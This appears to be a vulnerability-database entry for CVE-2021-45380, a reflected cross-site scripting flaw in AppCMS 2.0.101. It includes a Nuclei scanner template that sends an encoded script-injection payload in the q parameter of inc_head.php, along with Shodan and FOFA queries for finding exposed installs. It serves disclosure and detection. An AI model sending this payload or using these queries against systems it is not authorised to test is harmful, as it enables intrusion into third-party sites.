CVE-2021-45380: AppCMS - Cross-Site Scripting

2025-08-01 AppCMS PoC Public

Description

AppCMS 2.0.101 has a cross-site scripting vulnerability in \templates\m\inc_head.php.

PoC

id: CVE-2021-45380

info:
  name: AppCMS - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: AppCMS 2.0.101 has a cross-site scripting vulnerability in \templates\m\inc_head.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://github.com/source-trace/appcms/issues/8
    - https://nvd.nist.gov/vuln/detail/CVE-2021-45380
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-45380
    cwe-id: CWE-79
    epss-score: 0.0253
    epss-percentile: 0.84111
    cpe: cpe:2.3:a:appcms:appcms:2.0.101:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: appcms
    product: appcms
    shodan-query:
      - http.html:"Powerd by AppCMS"
      - http.html:"powerd by appcms"
    fofa-query: body="powerd by appcms"
  tags: cve2021,cve,appcms,xss,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '""></script><script>alert(document.domain)</script>'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d1b3182f1bdd55180cf0be39b76862287569671890b930773bf5a63ab48a29df022100e51b6e1204c93330b1b17a5917efc3f041f7090b3f2dfeea7cce3cebdabb868c:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities